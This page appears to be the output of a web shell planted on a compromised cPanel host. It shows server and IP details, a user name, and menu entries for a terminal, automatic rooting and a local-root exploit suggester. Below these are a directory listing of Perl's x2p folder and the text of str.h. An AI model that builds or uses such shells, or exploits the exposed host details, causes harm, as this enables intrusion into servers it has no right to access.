Linux cpanel2.daytoncreative.net 2.6.32-754.29.2.el6.x86_64 #1 SMP Tue May 12 17:39:04 UTC 2020 x86_64
Apache/2.4.43 (cPanel) OpenSSL/1.1.1g mod_bwlimited/1.4
Server IP : 70.62.220.67 & Your IP : 216.73.216.193
Domains :
Cant Read [ /etc/named.conf ]
User : michaelgreg
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
log /
perl-5.20.2 /
x2p /
Delete
Unzip
Name
Size
Permission
Date
Action
EXTERN.h
404
B
-r--r--r--
2014-12-27 11:49
INTERN.h
413
B
-r--r--r--
2014-12-27 11:49
Makefile
2.99
KB
-rw-r--r--
2016-10-10 17:34
Makefile.SH
4.07
KB
-r-xr-xr-x
2014-12-27 11:49
a2p
109.9
KB
-rwxr-xr-x
2016-10-10 17:41
a2p.c
136.21
KB
-r--r--r--
2014-12-27 11:49
a2p.h
8.48
KB
-r--r--r--
2014-12-27 11:49
a2p.o
121.44
KB
-rw-r--r--
2016-10-10 17:41
a2p.pod
5.93
KB
-r--r--r--
2014-12-27 11:49
a2p.y
10.02
KB
-r--r--r--
2014-12-27 11:49
a2py.c
25.38
KB
-r--r--r--
2014-12-27 11:49
find2perl
23.09
KB
-rwxr-xr-x
2016-10-10 17:41
find2perl.PL
24.25
KB
-r--r--r--
2014-12-27 11:49
hash.c
3.04
KB
-r--r--r--
2014-12-27 11:49
hash.h
1.24
KB
-r--r--r--
2014-12-27 11:49
hash.o
3.16
KB
-rw-r--r--
2016-10-10 17:41
makefile
11.88
KB
-rw-r--r--
2016-10-10 17:41
makefile.old
2.99
KB
-rw-r--r--
2016-10-10 17:41
psed
52.12
KB
-rwxr-xr-x
2016-10-10 17:41
s2p
52.12
KB
-rwxr-xr-x
2016-10-10 17:41
s2p.PL
53.93
KB
-r--r--r--
2014-12-27 11:49
str.c
5.88
KB
-r--r--r--
2014-12-27 11:49
str.h
1.33
KB
-r--r--r--
2014-12-27 11:49
str.o
4.92
KB
-rw-r--r--
2016-10-10 17:41
util.c
3.5
KB
-r--r--r--
2014-12-27 11:49
util.h
956
B
-r--r--r--
2014-12-27 11:49
util.o
3.94
KB
-rw-r--r--
2016-10-10 17:41
walk.c
47.51
KB
-r--r--r--
2014-12-27 11:49
walk.o
70.93
KB
-rw-r--r--
2016-10-10 17:41
Save
Rename
/* str.h * * Copyright (C) 1991, 1992, 1993, 1994, 1995, 1999, 2000, 2005 * by Larry Wall and others * * You may distribute under the terms of either the GNU General Public * License or the Artistic License, as specified in the README file. */ struct string { char * str_ptr; /* pointer to malloced string */ double str_nval; /* numeric value, if any */ int str_len; /* allocated size */ int str_cur; /* length of str_ptr as a C string */ union { STR *str_next; /* while free, link to next free str */ } str_link; char str_pok; /* state of str_ptr */ char str_nok; /* state of str_nval */ }; /* the following macro updates any magic values this str is associated with */ #define STABSET(x) (x->str_link.str_magic && stabset(x->str_link.str_magic,x)) EXT STR **tmps_list; EXT long tmps_max INIT(-1); char * str_2ptr ( STR *str ); void str_cat ( STR *str, const char *ptr ); void str_free ( STR *str ); char * str_gets ( STR *str, FILE *fp ); int str_len ( STR *str ); STR * str_make ( const char *s ); void str_ncat ( STR *str, const char *ptr, int len ); STR * str_new ( int len ); void str_nset ( STR *str, const char *ptr, int len ); void str_numset ( STR *str, double num ); void str_scat ( STR *dstr, STR *sstr ); void str_set ( STR *str, const char *ptr ); void str_sset ( STR *dstr, STR *sstr );